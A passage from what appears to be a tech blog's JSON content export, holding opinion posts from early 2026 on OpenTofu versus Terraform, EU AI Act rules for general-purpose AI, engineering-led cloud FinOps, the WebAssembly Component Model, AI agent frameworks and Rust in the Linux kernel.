Terraform to OpenTofu. My answer is, as usual, \u0026ldquo;it depends\u0026rdquo; — but I can be more specific about what it depends on.\nMigrate if: You\u0026rsquo;re concerned about future license changes. You value client-side state encryption. You want to contribute to the tool\u0026rsquo;s development. You\u0026rsquo;re not heavily invested in Terraform Cloud/Enterprise features. You\u0026rsquo;re running open-source Terraform anyway.\nStay if: You\u0026rsquo;re deeply integrated with HCP Terraform. Your team relies on Sentinel for policy enforcement. You have extensive Terraform Enterprise workflows. The migration risk outweighs the philosophical benefits.\nWait if: You\u0026rsquo;re on a stable Terraform setup that\u0026rsquo;s working fine and you have other priorities. The switching cost is real — not in HCL changes (which are minimal) but in CI/CD pipeline updates, state migration procedures, team training, and documentation updates.\nThe actual HCL syntax remains almost entirely compatible. I\u0026rsquo;ve migrated several projects by literally replacing the terraform binary with tofu and updating provider registry references. But the operational overhead of a migration extends well beyond the binary swap, especially in organizations with established workflows and automation.\nPulumi, CDK, and the Broader Landscape # It\u0026rsquo;s worth noting that the Terraform/OpenTofu question exists within a broader infrastructure-as-code landscape that keeps evolving. Pulumi continues to gain traction among teams that prefer general-purpose programming languages over HCL. AWS CDK has matured into a solid option for AWS-centric shops. And newer entrants like Winglang and SST are carving out niches in specific domains.\nI remain a pragmatist here. HCL-based tools (whether Terraform or OpenTofu) have an enormous ecosystem advantage and a well-understood operational model. They may not be the most elegant solution for every problem, but they\u0026rsquo;re the most widely understood, which has real value in teams with mixed experience levels. For organizations dealing with multi-cloud deployments, tools like these are essential for the consistency Google Cloud is pushing with platform engineering.\nThat said, if I were starting a greenfield project today with a team of experienced developers, I\u0026rsquo;d seriously consider Pulumi with TypeScript. The type safety, testability, and expressiveness of a real programming language addresses many of the frustrations I\u0026rsquo;ve accumulated over years of writing complex HCL.\nMy Take # The OpenTofu fork has been, on balance, a positive development for the infrastructure-as-code ecosystem. Competition drives innovation, and both projects are shipping features faster than they would in a monopoly scenario. The state encryption feature alone has justified the fork\u0026rsquo;s existence for security-conscious organizations.\nBut I\u0026rsquo;d caution against treating this as a religious debate. Both tools solve the same core problem competently. The best choice depends on your specific constraints — compliance requirements, team expertise, cloud provider mix, and organizational investment in either ecosystem.\nWhat I\u0026rsquo;m most interested in watching is whether the provider ecosystem remains shared or begins to fragment. That\u0026rsquo;s the variable that could shift the calculus dramatically in either direction. For now, we have the luxury of choice, and that\u0026rsquo;s a good position to be in.\n","date":"26 February 2026","externalUrl":null,"permalink":"/posts/260226-opentofu-infrastructure-as-code/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenTofu has matured significantly since its fork from Terraform. Here’s where things stand and what it means for teams managing cloud infrastructure.","title":"OpenTofu's Growing Pains — The State of Infrastructure as Code in 2026","type":"posts"},{"content":"","date":"26 February 2026","externalUrl":null,"permalink":"/tags/terraform/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Terraform","type":"tags"},{"content":"Six months ago, in August 2025, the EU AI Act\u0026rsquo;s provisions for general-purpose AI (GPAI) models officially came into force. We\u0026rsquo;re now past the initial grace period and squarely into the era where non-compliance has real consequences. If you\u0026rsquo;re building anything that touches foundation models in Europe — or for European customers — this matters to you.\nI\u0026rsquo;ve spent the last few weeks reviewing how the landscape has shifted since those provisions kicked in, and the picture is more nuanced than either the doomsayers or the optimists predicted.\nWhat the GPAI Rules Actually Require # Let\u0026rsquo;s start with the basics, because I still encounter teams that haven\u0026rsquo;t fully internalized what\u0026rsquo;s required. The Act distinguishes between standard GPAI models and those classified as presenting \u0026ldquo;systemic risk\u0026rdquo; — essentially models trained with compute exceeding 10^25 FLOPs, though the Commission can update these thresholds.\nFor all GPAI providers, the requirements include maintaining up-to-date technical documentation, providing clear information to downstream deployers, implementing a copyright compliance policy, and publishing a sufficiently detailed summary of training data. These requirements align with broader industry best practices around AI system governance. That last one has been the sticking point for most organizations I\u0026rsquo;ve spoken with.\nFor systemic-risk models, the bar is considerably higher: adversarial testing, incident monitoring and reporting to the AI Office, cybersecurity protections, and energy consumption reporting. The major labs — OpenAI, Google DeepMind, Anthropic, Mistral — have all published their compliance frameworks, though the depth and transparency varies significantly.\nThe Documentation Burden Is Real # In my experience working with teams integrating GPAI models into production systems, the documentation requirements have been the most disruptive change. Not because they\u0026rsquo;re unreasonable — they\u0026rsquo;re actually quite sensible from a governance perspective — but because most organizations simply weren\u0026rsquo;t set up to produce this level of documentation about their AI pipelines.\nThe technical documentation requirement under Annex XI is comprehensive. You need to describe the model architecture, training methodology, data sources and preprocessing, evaluation results, computational resources used, and known limitations. For teams that have been moving fast and iterating quickly on model fine-tuning and RAG pipelines, this means retroactively documenting decisions that were made informally.\nI\u0026rsquo;ve seen a few approaches emerge. Some larger organizations have hired dedicated AI governance teams. Others have integrated documentation requirements into their CI/CD pipelines — essentially treating model cards and data sheets as build artifacts that must pass review before deployment. This mirrors broader supply chain security governance approaches where verification is built into the development process rather than bolted on afterward. The latter approach resonates more with my engineering sensibilities: if compliance is part of the pipeline, it doesn\u0026rsquo;t become an afterthought.\nOpen Source Gets a (Partial) Pass # One aspect that deserves attention is how the Act treats open-source GPAI models. There\u0026rsquo;s a partial exemption: open-source models released under permissive licenses are exempt from some documentation and transparency requirements, unless they present systemic risk. This was a hard-fought compromise during the legislative process, and it\u0026rsquo;s proving to be a meaningful differentiator.\nProjects like Mistral\u0026rsquo;s open-weight releases and Meta\u0026rsquo;s Llama family have benefited from this carve-out. The broader ecosystem of open-source AI models continues to expand despite regulatory pressures. But there\u0026rsquo;s an important subtlety: the exemption applies to the model provider, not to deployers. If you take an open-source model and deploy it in a high-risk application in the EU, you inherit the full compliance burden for your specific use case.\nThis has created an interesting dynamic. I\u0026rsquo;m seeing more organizations choosing open-source base models not just for cost or flexibility reasons, but specifically because the compliance pathway is clearer and more manageable when you have full visibility into the model\u0026rsquo;s architecture and training process. This approach aligns with how foundation model architectures are evolving toward better transparency and control.\nThe Codes of Practice Are Still Taking Shape # The European AI Office has been working with industry stakeholders to develop codes of practice for GPAI providers. These codes are supposed to provide detailed guidance on how to meet the Act\u0026rsquo;s requirements — think of them as the practical \u0026ldquo;how\u0026rdquo; behind the legal \u0026ldquo;what.\u0026rdquo;\nAs of now, the drafts I\u0026rsquo;ve reviewed cover transparency, copyright compliance, and risk assessment, but they\u0026rsquo;re still being refined. The challenge is striking the right balance between specificity (which providers need for actual implementation) and flexibility (which prevents the codes from becoming obsolete as the technology evolves).\nFor smaller companies and startups, the codes of practice may actually be a lifeline. Without them, the Act\u0026rsquo;s requirements are high-level enough that interpretation becomes expensive — you either need specialized legal counsel or you over-engineer your compliance approach, wasting resources either way.\nMy Take: Pragmatic Progress with Growing Pains # I\u0026rsquo;ll be honest: six months ago, I was skeptical about whether these regulations would achieve anything beyond creating paperwork. But I\u0026rsquo;ve come around somewhat. The documentation requirements, while burdensome, have forced organizations to be more intentional about their AI development practices. Teams that used to treat model selection and deployment as purely technical decisions are now considering governance implications from the start.\nThe energy consumption reporting requirement for systemic-risk models is also quietly significant. We\u0026rsquo;re starting to get real data about the environmental cost of large-scale AI training, and that transparency will only become more important as these models grow.\nThat said, enforcement remains the open question. The AI Office has limited resources, and the interaction between EU-level oversight and national authorities is still being worked out. The next six months — leading up to the full enforcement of the high-risk AI system requirements in August — will tell us a lot about whether this framework has teeth.\nFor now, my advice to any team building with AI in or for Europe: don\u0026rsquo;t wait for perfect clarity. Start documenting your models, data pipelines, and deployment decisions today. The organizations that treat this as an opportunity to improve their engineering practices — rather than a regulatory burden to minimize — will be in the strongest position regardless of how enforcement develops.\nThis is part of a broader pattern I\u0026rsquo;ve been tracking in this series: AI development is maturing from a \u0026ldquo;move fast and break things\u0026rdquo; discipline into something that looks more like traditional software engineering, with governance, documentation, and accountability baked into the process. The initial developer compliance implications have only intensified, requiring teams to treat AI governance as a core engineering discipline rather than an afterthought. Whether that\u0026rsquo;s a good thing depends on your perspective, but it\u0026rsquo;s clearly the direction we\u0026rsquo;re heading.\n","date":"19 February 2026","externalUrl":null,"permalink":"/posts/260219-eu-ai-act-gpai-compliance/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The EU AI Act’s general-purpose AI provisions have been in force for six months. Here’s what’s actually changed for developers and organizations building with foundation models.","title":"EU AI Act GPAI Rules — Six Months In, and the Compliance Clock Is Ticking","type":"posts"},{"content":"I had an interesting conversation with a CTO last week. She told me her team\u0026rsquo;s cloud bill had grown 40% year-over-year despite serving roughly the same traffic. Not because they were doing anything wrong — they\u0026rsquo;d adopted new managed services, scaled for peak capacity, and added observability tooling. All good engineering decisions. But nobody was tracking the cumulative cost impact until the quarterly review hit.\nThis is a story I\u0026rsquo;m hearing more and more. The FinOps Foundation\u0026rsquo;s latest State of FinOps report shows that cloud cost management is now the top concern for engineering leadership, surpassing even security. And the solution isn\u0026rsquo;t finance dashboards — it\u0026rsquo;s engineering ownership.\nThe Shift from Finance to Engineering # Traditional cost management follows a simple pattern: finance sets budgets, IT stays within them, everyone reviews monthly reports. This worked when infrastructure was capital expenditure — you bought servers, amortized them over three years, and that was that.\nCloud broke this model completely. Every API call, every container spin-up, every byte stored is a variable cost decision made by engineers, often implicitly through architectural choices. When a developer chooses DynamoDB over PostgreSQL, or configures auto-scaling with generous headroom, or enables detailed CloudWatch metrics on every Lambda function, they\u0026rsquo;re making cost decisions. They just don\u0026rsquo;t know it. This connects to broader platform engineering and infrastructure-as-code practices that make these decisions visible and auditable.\nThe FinOps movement recognizes this reality and pushes cost awareness into the engineering workflow. But the first generation of FinOps was still finance-led: tagging policies, chargeback models, monthly reports with scary graphs. That\u0026rsquo;s necessary infrastructure, but it doesn\u0026rsquo;t change behavior where it matters — at the point of architectural and operational decisions.\nEngineering-First FinOps # The teams I see doing this well have shifted to what I\u0026rsquo;d call engineering-first FinOps. Here\u0026rsquo;s what that looks like in practice:\nCost as a metric in CI/CD. Tools like Infracost integrate into pull request workflows to show the estimated cost impact of infrastructure changes before they\u0026rsquo;re merged. This aligns with supply chain security practices where change verification matters. A Terraform change that adds a NAT Gateway to three availability zones gets a comment showing the ~$100/month per gateway cost. The engineer makes an informed decision, the reviewer has context, and surprises are caught early.\nUnit economics in dashboards. Instead of tracking total cloud spend, track cost per request, cost per user, cost per transaction. These unit metrics let you distinguish between cost growth that\u0026rsquo;s proportional to business growth (healthy) and cost growth that\u0026rsquo;s disproportionate (a problem). Grafana and Datadog both have solid integrations with cloud billing APIs now, and embedding cost panels alongside performance metrics makes the trade-offs visible.\nArchitecture decision records with cost implications. When you\u0026rsquo;re choosing between a managed service and a self-hosted alternative, document the cost comparison alongside the operational trade-offs. A managed Kafka service might cost 3x what self-hosted Kafka costs in compute, but if it saves 0.5 FTE in operational overhead, that\u0026rsquo;s usually a win. Making these calculations explicit improves decision-making and creates institutional knowledge.\nReserved capacity and commitment planning as engineering work. Savings Plans and Reserved Instances can save 30-60% on baseline compute, but they require understanding your workload patterns. This isn\u0026rsquo;t finance work — it\u0026rsquo;s capacity planning, and engineers are better positioned to forecast it. Understanding infrastructure maturity and cloud platform capabilities helps predict cost-efficient workload patterns. The teams that treat commitment purchases as an engineering planning exercise consistently outperform those that delegate it to procurement.\nThe Tooling Landscape # The FinOps tooling space has matured significantly. Kubecost provides excellent Kubernetes cost allocation, breaking down spend by namespace, deployment, and even individual pod. CAST AI automates Kubernetes cost optimization through intelligent node selection and autoscaling. Cloud-native tools like AWS Cost Explorer and Azure Cost Management have gotten better at granular allocation.\nOpenCost, the CNCF sandbox project, is worth watching as an open-source alternative to commercial solutions. It provides real-time cost monitoring for Kubernetes and integrates well with Prometheus-based observability stacks.\nBut tooling alone isn\u0026rsquo;t enough. I\u0026rsquo;ve seen teams deploy Kubecost, look at the dashboards for two weeks, and then ignore them. The tooling needs to be embedded in workflows — PR checks, sprint planning, architecture reviews — to actually change behavior.\nThe Waste Problem # Let me be blunt: most organizations are wasting 25-35% of their cloud spend. The FinOps Foundation\u0026rsquo;s data backs this up consistently. The biggest culprits:\nIdle resources. Development environments running 24/7, load balancers with no backends, EBS volumes detached from instances. Automated cleanup policies — scale dev environments to zero on nights and weekends, alert on idle resources, automatically terminate instances that haven\u0026rsquo;t served traffic in 72 hours — can cut this dramatically.\nOver-provisioned instances. Running m5.xlarge when your workload fits in a t3.medium. Right-sizing recommendations from cloud providers are often accurate and consistently ignored. Make right-sizing a quarterly engineering task, not a suggestion.\nData transfer costs. The hidden tax of cloud computing. Cross-AZ traffic, NAT Gateway data processing, CloudFront to origin transfers — these costs are invisible until they\u0026rsquo;re not. Architect for data locality, use VPC endpoints, and understand your data flow patterns.\nMy Take # The most important shift in FinOps isn\u0026rsquo;t technological — it\u0026rsquo;s cultural. Engineers need to care about cost the same way they care about performance and reliability. Not because it\u0026rsquo;s their job to minimize spend, but because cost is a signal about architectural health. A system that costs twice as much as it should is usually a system with other problems: over-complexity, poor resource management, missing automation.\nThe best engineers I\u0026rsquo;ve worked with have always had an intuitive sense of cost efficiency. They choose the right tool for the job, not the most expensive managed service. They build systems that scale down as well as they scale up. They understand that every architecture decision has a long-term cost implication.\nIf your team doesn\u0026rsquo;t have visibility into the cost of the systems they build and operate, fix that first. Everything else follows from awareness.\nMore infrastructure perspectives in my Infrastructure Notes series.\n","date":"12 February 2026","externalUrl":null,"permalink":"/posts/260212-cloud-finops-engineering-ownership/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"FinOps has evolved from a finance initiative to an engineering discipline, and the teams that treat cloud costs as a first-class engineering metric are winning.","title":"Cloud FinOps — Why Engineers Own the Cost Conversation Now","type":"posts"},{"content":" Overview # Building cloud infrastructure is one thing; operating it in production is another. This series covers cloud operations—the practices, tools, and strategies that keep systems reliable, cost-effective, and resilient. Topics include observability and monitoring, cost optimization at scale, incident response patterns, and the operational culture that separates well-run systems from perpetual firefighting.\nWhether you\u0026rsquo;re responsible for reliability, reducing cloud costs, or leading incident response, these insights apply directly to your work.\nWhat You\u0026rsquo;ll Find Here # Observability \u0026amp; Monitoring: Building effective monitoring systems, understanding metrics, logs, and traces. Knowing what to watch tells you when to care.\nCost Optimization: Understanding cloud billing, rightsizing, reserved instances, and spot instances. Reducing costs without sacrificing reliability requires strategy.\nIncident Response: Preparing for failures, detecting issues early, response playbooks, and learning from incidents without blame.\nInfrastructure as Code: Declarative infrastructure, drift detection, configuration management, and making infrastructure auditable and reproducible.\nCapacity Planning: Predicting growth, autoscaling strategies, and ensuring infrastructure scales smoothly with demand.\nDisaster Recovery: Backup strategies, failover mechanisms, multi-region concerns, and recovery time objectives.\nLearning Path # Master observability fundamentals — understand what metrics and logs actually tell you Implement comprehensive monitoring — dashboards, alerting, and actionable signals Learn to optimize costs — understand billing, identify waste, and right-size resources Build incident response muscle — playbooks, on-call rotations, and blameless postmortems Plan for growth — capacity planning, autoscaling, and handling traffic spikes Key Topics Covered # Monitoring \u0026amp; Observability: Prometheus, Datadog, New Relic, logs, metrics, traces, and SLOs Cloud Cost Management: RI analysis, spot pricing, reserved capacity, workload migration, and FinOps Incident Management: PagerDuty, alerting rules, runbooks, postmortem processes, and on-call culture Infrastructure as Code: Terraform, CloudFormation, Pulumi, Ansible, and drift detection Autoscaling \u0026amp; Performance: Load balancing, horizontal scaling, vertical scaling, and performance testing Disaster Recovery: Backup strategies, RTO/RPO targets, multi-region failover, and testing DR Related Series # Explore complementary areas: Cloud Platform Watch (new AWS/Azure/GCP features and pricing), Kubernetes \u0026amp; Containers (container orchestration operations)\n","date":"12 February 2026","externalUrl":null,"permalink":"/series/cloud-operations/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Cloud Operations","type":"series"},{"content":"","date":"5 February 2026","externalUrl":null,"permalink":"/series/systems--emerging-languages/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Systems \u0026 Emerging Languages","type":"series"},{"content":"","date":"5 February 2026","externalUrl":null,"permalink":"/tags/webassembly/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"WebAssembly","type":"tags"},{"content":"The WebAssembly Component Model has been quietly reaching a critical inflection point. This week, the Bytecode Alliance published updated specifications for WASI 0.2.2, and the tooling ecosystem has matured enough that I think it\u0026rsquo;s time to pay serious attention. WebAssembly started as a browser technology, but its future is increasingly server-side, edge, and everywhere in between. As Kubernetes and container orchestration mature, WebAssembly components represent a complementary approach to workload portability and isolation.\nI\u0026rsquo;ve been experimenting with Wasm components for a side project — a plugin system for a data processing pipeline — and the experience has shifted from \u0026ldquo;interesting but painful\u0026rdquo; to \u0026ldquo;actually productive.\u0026rdquo; That\u0026rsquo;s a significant change from even six months ago.\nThe Component Model Explained # If you\u0026rsquo;ve used WebAssembly before, you\u0026rsquo;ve probably worked with core Wasm modules: single compilation units that export functions and import memory. They work, but they\u0026rsquo;re limited. Sharing complex data types between modules requires manual serialization. Composing modules into larger systems is ad-hoc. There\u0026rsquo;s no standard way to describe a module\u0026rsquo;s interface beyond its raw function signatures.\nThe Component Model fixes this by introducing a higher-level abstraction. A component is a Wasm module with a rich type system (WIT — WebAssembly Interface Types) that describes its imports and exports using high-level types: strings, records, variants, lists, options, results. Two components can be composed together if their interfaces match, regardless of the source language.\nThis is the key insight: language interoperability at the binary level. A component written in Rust can be composed with a component written in Python (via componentize-py), which can be composed with a component written in Go. They share a common type system and calling convention. This aligns with broader development ecosystem trends toward polyglot systems and language interoperability. No FFI, no serialization, no RPC overhead.\nWASI: The System Interface # The other half of the equation is WASI — the WebAssembly System Interface. If the Component Model defines how components talk to each other, WASI defines how components talk to the outside world: file systems, network sockets, clocks, random number generators, HTTP.\nWASI 0.2 (the \u0026ldquo;Preview 2\u0026rdquo; release that\u0026rsquo;s now stabilizing) is built on the Component Model. Each WASI capability is defined as a WIT interface, and a component declares which capabilities it needs. This gives you a capability-based security model by default: a component can\u0026rsquo;t access the network unless it explicitly imports the network interface, and the host explicitly provides it.\nFor anyone who\u0026rsquo;s dealt with container security — trying to restrict what a process can access via seccomp profiles, AppArmor, or capability dropping — the WASI model is refreshingly clean. The sandbox is the default, and capabilities are explicitly granted.\nThe Tooling Ecosystem # What\u0026rsquo;s changed recently is the tooling. cargo-component makes building Rust components straightforward. componentize-py handles Python. jco provides JavaScript tooling and can transpile components to run in Node.js or browsers. wit-bindgen generates language-specific bindings from WIT definitions.\nThe runtime story is also improving. Wasmtime from the Bytecode Alliance is the reference implementation and handles components well. WAMR targets embedded and IoT. Cloudflare Workers, Fermyon Spin, and Fastly Compute all support Wasm components in production, meaning there are real deployment targets available today.\nThe developer experience still has rough edges. Error messages from the component toolchain can be cryptic, debugging across component boundaries requires patience, and the documentation assumes more familiarity with the spec than most developers have. But it\u0026rsquo;s dramatically better than a year ago.\nReal Use Cases # The plugin system use case is the most immediately compelling. If you\u0026rsquo;re building a platform that needs user-extensible logic — data transformation pipelines, API gateways, workflow engines — Wasm components let you run user-supplied code safely without the overhead of containers or the risk of native code execution.\nEnvoy Proxy has been using Wasm for extensibility for years, and the Component Model makes that pattern more accessible. Instead of building custom plugin SDKs for each language, you define your plugin interface in WIT and let developers implement it in whatever language they prefer.\nEdge computing is another natural fit. Deploy the same component to Cloudflare Workers, a local Wasmtime instance, or an embedded device. The binary is portable, the sandboxing is built-in, and the startup time is measured in microseconds rather than the seconds it takes to boot a container. This represents a significant shift in how infrastructure is evolving toward lighter-weight, more portable compute primitives. This makes WebAssembly particularly relevant for edge computing and industrial IoT deployments where density and responsiveness matter.\nI\u0026rsquo;m also interested in the supply chain security implications. A Wasm component is a sealed unit with a declared interface. You can verify exactly what capabilities it requires before running it. Combined with signing and provenance metadata, this could meaningfully improve the software supply chain story. This aligns with broader SLSA and supply chain security frameworks that emphasize transparency and verification.\nMy Take # I think WebAssembly components are going to be a significant part of the server-side landscape within the next two to three years. Not replacing containers — that\u0026rsquo;s an overblown narrative — but complementing them for specific use cases where portability, security, and multi-language interoperability matter.\nThe \u0026ldquo;write once, run anywhere\u0026rdquo; comparison to Java is somewhat apt, but the execution is different. Java achieved portability through a managed runtime with its own ecosystem. Wasm achieves it through a minimal, sandboxed compilation target that multiple languages can target. The Component Model adds the composition layer that makes this practical for real systems.\nIf you\u0026rsquo;re building a platform that needs plugin extensibility, or deploying to edge environments, or working on systems where fine-grained sandboxing matters, the Component Model is worth evaluating now. The ecosystem is past the early adopter phase and entering the early majority. Start with cargo-component if you know Rust, or jco if you\u0026rsquo;re in the JavaScript world.\nContinuing my exploration of the evolving development landscape in the Developer Landscape series.\n","date":"5 February 2026","externalUrl":null,"permalink":"/posts/260205-webassembly-component-model-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The WebAssembly Component Model is reaching maturity, and it might finally deliver on the ‘write once, run anywhere’ promise that Java made thirty years ago.","title":"WebAssembly Components — The Missing Piece for Portable Software","type":"posts"},{"content":"If you\u0026rsquo;ve been following the AI tooling space at all this month, you\u0026rsquo;ll have noticed that \u0026ldquo;agentic AI\u0026rdquo; has become the dominant buzzword of early 2026. Every major framework has shipped agent capabilities, Microsoft\u0026rsquo;s AutoGen just released a significant rewrite, and the number of agent frameworks on GitHub has passed the point where anyone can reasonably evaluate them all. It feels like the JavaScript framework explosion of the mid-2010s, except the stakes are higher because these systems take actions in the real world.\nI\u0026rsquo;ve spent the past few weeks evaluating several of these frameworks for a client project, and I have thoughts.\nThe Framework Landscape # The current field breaks down roughly into three tiers. At the top, you have the battle-tested frameworks: LangChain/LangGraph, Microsoft\u0026rsquo;s AutoGen, and CrewAI. These have large communities, decent documentation, and enough production deployments to have surfaced (and sometimes fixed) real architectural issues.\nIn the middle tier, you have opinionated frameworks that solve specific problems well: Semantic Kernel for .NET shops, Haystack for search-centric applications, and DSPy for teams that want a more programmatic approach to prompt engineering.\nThen there\u0026rsquo;s the long tail — hundreds of frameworks that are essentially thin wrappers around the OpenAI API with a loop and some string formatting. These are the ones to be cautious about.\nWhat Actually Matters in an Agent Framework # After building several agent-based systems, I\u0026rsquo;ve settled on a short list of capabilities that separate useful frameworks from toys:\nState management and persistence. An agent that loses its context between turns is barely an agent. LangGraph\u0026rsquo;s approach of treating agent state as a graph with checkpointing is architecturally sound. You can pause, resume, inspect, and even replay agent execution. AutoGen\u0026rsquo;s new conversation patterns handle this differently but equally well. If your framework can\u0026rsquo;t persist and restore agent state across process restarts, walk away.\nTool calling with validation. The agent needs to call external tools — APIs, databases, file systems — and the framework needs to handle this safely. That means input validation, output parsing, error handling, and timeout management. It sounds basic, but many frameworks treat tool calling as an afterthought. The best ones let you define tools with proper type signatures and validate both inputs and outputs against schemas.\nObservability. When an agent makes a bad decision — and it will — you need to understand why. That means structured logging of every LLM call, every tool invocation, every decision point. LangSmith and similar tracing tools have made this much better, but observability should be a first-class concern in the framework itself, not bolted on after the fact.\nHuman-in-the-loop controls. Any agent that can take real actions needs a way for humans to approve, reject, or modify those actions before execution. This is non-negotiable for production systems. The frameworks that handle this well make it easy to insert approval gates at any point in the agent\u0026rsquo;s execution flow.\nThe Architecture Question # The more fundamental question is whether agents should be single-model systems or multi-agent collaborations. The multi-agent pattern — where specialized agents communicate to solve complex tasks — is theoretically elegant and practically messy.\nCrewAI leans heavily into the multi-agent metaphor, with \u0026ldquo;crews\u0026rdquo; of agents that have roles, goals, and backstories. It\u0026rsquo;s intuitive for simple workflows but gets complicated quickly when you need fine-grained control over agent communication. AutoGen\u0026rsquo;s new architecture is more flexible, with explicit conversation topologies that let you define exactly how agents interact.\nMy experience has been that most problems don\u0026rsquo;t need multi-agent systems. A single agent with well-designed tools and a clear prompt handles 80% of use cases more reliably than a crew of agents negotiating with each other. Multi-agent systems add latency (every inter-agent message is an LLM call), cost (token usage multiplies quickly), and debugging complexity.\nThe exceptions are genuine workflow orchestration problems where different steps require fundamentally different capabilities or models. A research agent that gathers information, hands it to an analysis agent with domain expertise, and then passes results to a writing agent — that\u0026rsquo;s a reasonable multi-agent architecture. But you should exhaust the single-agent approach first.\nThe Reliability Problem Nobody Talks About # Here\u0026rsquo;s the thing that the demos don\u0026rsquo;t show you: agents fail in production. A lot. The failure modes are different from traditional software — instead of exceptions and error codes, you get plausible-sounding wrong answers, infinite loops, and creative misinterpretations of instructions.\nBuilding reliable agents requires the same discipline as building any distributed system: retry logic, circuit breakers, fallback strategies, and comprehensive testing. Except testing is harder because the LLM\u0026rsquo;s behavior is non-deterministic. Your agent might handle a task perfectly 95 times out of 100 and fail catastrophically the other 5.\nThe teams I\u0026rsquo;ve seen succeed with agents in production all share one trait: they treat the LLM as an unreliable component and build guardrails accordingly. Every action gets validated. Every output gets checked. The agent\u0026rsquo;s autonomy is bounded by explicit constraints, not just instructions in a prompt.\nMy Take # We\u0026rsquo;re in the \u0026ldquo;build everything\u0026rdquo; phase of agent frameworks, and consolidation is coming. My bet is that LangGraph and AutoGen will emerge as the dominant platforms, with CrewAI holding a niche for simpler orchestration use cases. The long tail of thin wrappers will mostly disappear.\nIf you\u0026rsquo;re starting an agent project today, pick a framework with strong state management and observability, start with a single agent, and invest heavily in evaluation and testing infrastructure. The framework choice matters less than the engineering discipline you bring to using it.\nAnd please, before you build an agent, ask yourself: does this actually need to be an agent, or would a well-designed pipeline with a few LLM calls handle it? The answer is often the latter.\nPart of my AI in Development series exploring practical AI integration.\n","date":"29 January 2026","externalUrl":null,"permalink":"/posts/260129-ai-agent-frameworks-landscape/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The AI agent framework landscape has exploded, with LangGraph, CrewAI, AutoGen, and dozens more competing for developer mindshare. Here’s what matters.","title":"AI Agent Frameworks — The Wild West of Autonomous Systems","type":"posts"},{"content":"","date":"22 January 2026","externalUrl":null,"permalink":"/tags/linux/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Linux","type":"tags"},{"content":"It\u0026rsquo;s been over two years since Rust was officially merged into the Linux kernel with version 6.1, and the journey has been anything but smooth. This week, the Rust for Linux project hit another milestone with expanded driver support landing in the 6.13 development cycle, and it\u0026rsquo;s a good moment to take stock of where things stand.\nI\u0026rsquo;ve been writing C for the better part of three decades. I understand the kernel community\u0026rsquo;s attachment to the language — it\u0026rsquo;s not just familiarity, it\u0026rsquo;s a deeply optimized toolchain and decades of institutional knowledge. But watching the Rust integration unfold has been one of the most interesting language adoption stories I\u0026rsquo;ve seen in my career.\nThe Technical Progress # The numbers tell a compelling story. Rust code in the kernel has grown from the initial infrastructure patches to real, functional subsystems. The Android team at Google has been the most visible driver, with Rust-based Binder IPC drivers in active development. The network PHY driver abstractions have been another success story, demonstrating that Rust can interface cleanly with existing C subsystems through well-designed safe abstractions.\nThe key technical insight that makes Rust work in the kernel is the concept of safe abstractions over unsafe primitives. The low-level hardware interactions still happen in unsafe blocks — you can\u0026rsquo;t avoid that when talking directly to hardware registers — but the API exposed to driver authors is safe Rust. A driver author working with a well-designed abstraction layer doesn\u0026rsquo;t need to think about use-after-free or data races. The compiler catches those classes of bugs at build time.\nThis matters because driver code is where most kernel bugs live. Studies consistently show that around 70% of kernel vulnerabilities are memory safety issues. If Rust can meaningfully reduce that number in new driver code, the security impact is significant.\nThe Cultural Friction # The technical challenges are solvable. The cultural ones are harder. The kernel community\u0026rsquo;s mailing list has seen heated debates about Rust, ranging from legitimate technical concerns to more fundamental disagreements about the direction of the project.\nSome veteran maintainers have pushed back on the idea that their C subsystems should need to accommodate Rust bindings. The argument isn\u0026rsquo;t unreasonable: maintaining bindings between two languages adds complexity, and the C side shouldn\u0026rsquo;t be constrained by what Rust can or can\u0026rsquo;t express. But the counterargument — that new contributors are increasingly more comfortable with Rust than C, and that memory safety provides measurable security benefits — is equally valid.\nLinus Torvalds has been pragmatic about it, as he tends to be. His position has essentially been: Rust needs to prove itself on its merits, maintainers shouldn\u0026rsquo;t be forced to learn it, and the integration should be gradual. That\u0026rsquo;s a reasonable stance, and it\u0026rsquo;s more or less what\u0026rsquo;s happening.\nWhat I\u0026rsquo;m Watching # The most interesting development isn\u0026rsquo;t the technical integration — it\u0026rsquo;s the tooling story. The Rust compiler\u0026rsquo;s target support for kernel builds has improved significantly, but there are still pain points around build system integration, cross-compilation for unusual architectures, and debugging tooling.\nGDB and LLDB support for mixed C/Rust debugging in kernel context is still rough. When you\u0026rsquo;re debugging a kernel panic that crosses the C-Rust boundary, the experience is nowhere near as smooth as pure C debugging with established tools. This is the kind of practical friction that determines whether working kernel developers actually adopt a language, regardless of its theoretical benefits.\nThe alloc crate situation is another area to watch. The kernel can\u0026rsquo;t use Rust\u0026rsquo;s standard allocation mechanisms because kernel memory allocation is fundamentally different — it needs to handle allocation failures gracefully, support different memory types (DMA, MMIO, etc.), and work within specific context constraints. The Rust for Linux project has built custom allocator support, but this means kernel Rust code can\u0026rsquo;t easily reuse libraries from the broader Rust ecosystem. It\u0026rsquo;s a necessary trade-off, but it limits one of Rust\u0026rsquo;s biggest advantages: its package ecosystem.\nThe Broader Implications # What\u0026rsquo;s happening in the Linux kernel is a microcosm of a larger trend. Safety-critical systems everywhere are grappling with the same question: can we adopt languages with stronger safety guarantees without abandoning decades of existing code and expertise?\nThe White House\u0026rsquo;s report on memory-safe languages from early 2024 put a policy spotlight on this question, and the ripple effects are reaching into defense contracting, automotive, and medical device software. This represents a broader shift in how the development ecosystem is evolving toward better safety and tooling. Linux\u0026rsquo;s approach — gradual adoption, interoperability with C, safe abstractions over unsafe foundations — is likely the template that other large C codebases will follow. The infrastructure implications are significant as safety in core systems affects how we build on top of them.\nMy Take # I think Rust in the kernel will succeed, but it will take another five years before it\u0026rsquo;s unremarkable. The driver ecosystem is where the impact will be felt first — new hardware drivers written in Rust, old ones maintained in C. This follows the broader pattern of language and tooling evolution where new 